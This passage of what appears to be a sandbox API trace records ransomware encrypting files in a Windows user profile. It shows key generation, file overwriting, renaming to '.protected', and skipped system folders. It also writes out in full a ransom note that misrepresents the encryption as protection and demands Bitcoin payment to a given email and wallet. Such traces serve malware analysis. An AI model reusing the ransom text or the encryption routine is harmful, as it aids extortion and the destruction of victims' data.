STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.621] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.622] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.622] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.622] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.622] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.622] CloseHandle (hObject=0x164) returned 1 [0080.622] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.622] lstrcmpiW (lpString1="ne", lpString2="Windows") returned -1 [0080.622] lstrcmpiW (lpString1="ne", lpString2="Program Files") returned -1 [0080.622] lstrcmpiW (lpString1="ne", lpString2="Program Files (x86)") returned -1 [0080.622] lstrcmpiW (lpString1="ne", lpString2="$Recycle.bin") returned 1 [0080.622] lstrcmpiW (lpString1="ne", lpString2="System Volume Information") returned -1 [0080.622] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne") returned 141 [0080.622] lstrcmpW (lpString1="ne", lpString2=".") returned 1 [0080.622] lstrcmpW (lpString1="ne", lpString2="..") returned 1 [0080.622] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\*") returned 143 [0080.623] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.623] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.623] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.623] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.623] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.623] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.623] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\.") returned 143 [0080.623] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.623] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.623] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.623] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.623] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.623] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.623] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.623] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\..") returned 144 [0080.623] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.623] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.623] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.623] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.623] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.623] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.623] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.623] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.623] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json") returned 155 [0080.623] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.623] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.623] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.623] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.624] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json") returned 155 [0080.624] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.624] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json") returned 155 [0080.624] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.624] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json") returned 155 [0080.624] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.624] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x20b, lpOverlapped=0x0) returned 1 [0080.625] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffdf5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.625] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x20b, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x20b, lpOverlapped=0x0) returned 1 [0080.625] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.625] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.625] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.625] CloseHandle (hObject=0x168) returned 1 [0080.625] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.protected") returned 165 [0080.626] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.protected")) returned 1 [0080.626] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.626] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.626] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\RESTORE_FILES.txt") returned 159 [0080.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.627] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.627] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.628] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.628] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.628] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.628] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.628] CloseHandle (hObject=0x164) returned 1 [0080.628] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.628] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0080.628] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0080.628] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0080.628] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0080.628] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0080.628] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl") returned 141 [0080.628] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0080.628] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0080.628] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\*") returned 143 [0080.628] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.629] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.629] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.629] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.629] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.629] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.629] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\.") returned 143 [0080.629] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.629] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.629] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.629] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.630] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.630] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.630] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.630] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\..") returned 144 [0080.630] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.630] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.630] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.630] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.630] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.630] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.630] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.630] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.630] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json") returned 155 [0080.630] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.630] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.630] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.630] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.630] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json") returned 155 [0080.631] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.631] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json") returned 155 [0080.631] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.631] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json") returned 155 [0080.631] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.631] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.632] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.632] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.632] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.632] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.632] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.632] CloseHandle (hObject=0x168) returned 1 [0080.632] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.protected") returned 165 [0080.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.protected")) returned 1 [0080.633] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.633] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.633] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\RESTORE_FILES.txt") returned 159 [0080.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.633] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 